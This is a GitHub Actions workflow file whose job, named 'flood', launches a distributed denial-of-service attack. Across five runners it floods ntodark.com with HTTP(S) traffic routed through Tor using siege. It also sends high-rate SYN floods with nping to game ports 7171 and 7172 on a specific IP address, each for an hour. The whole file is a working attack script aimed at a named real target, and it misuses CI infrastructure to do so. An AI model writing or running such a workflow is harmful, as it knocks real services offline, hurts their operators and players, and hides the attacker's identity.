name: ntodark
on:
  workflow_dispatch:

jobs:
  flood:
    runs-on: ubuntu-latest
    strategy:
      matrix:
        runner: [1,2,3,4,5]
    steps:
      - name: Install tools
        run: |
          sudo apt-get update -qq
          sudo apt-get install -y siege tor proxychains-ng nmap curl

      - name: Configure Siege
        run: |
          mkdir -p ~/.siege
          echo 'limit = 1000' > ~/.siege/siege.conf
          echo 'connection = close' >> ~/.siege/siege.conf
          echo 'verbose = true' >> ~/.siege/siege.conf

      - name: Start Tor daemon
        run: |
          sudo systemctl start tor
          sleep 5

      - name: Attack HTTP(S) via Tor
        run: |
          proxychains4 -q siege -c 1000 -t 3600s http://ntodark.com &
          proxychains4 -q siege -c 1000 -t 3600s https://ntodark.com &
          sleep 3600

      - name: Attack game ports
        run: |
          /usr/bin/nping --tcp -p 7171 --flags SYN --rate 200000 34.151.221.105 &
          /usr/bin/nping --tcp -p 7172 --flags SYN --rate 200000 34.151.221.105 &
          sleep 3600
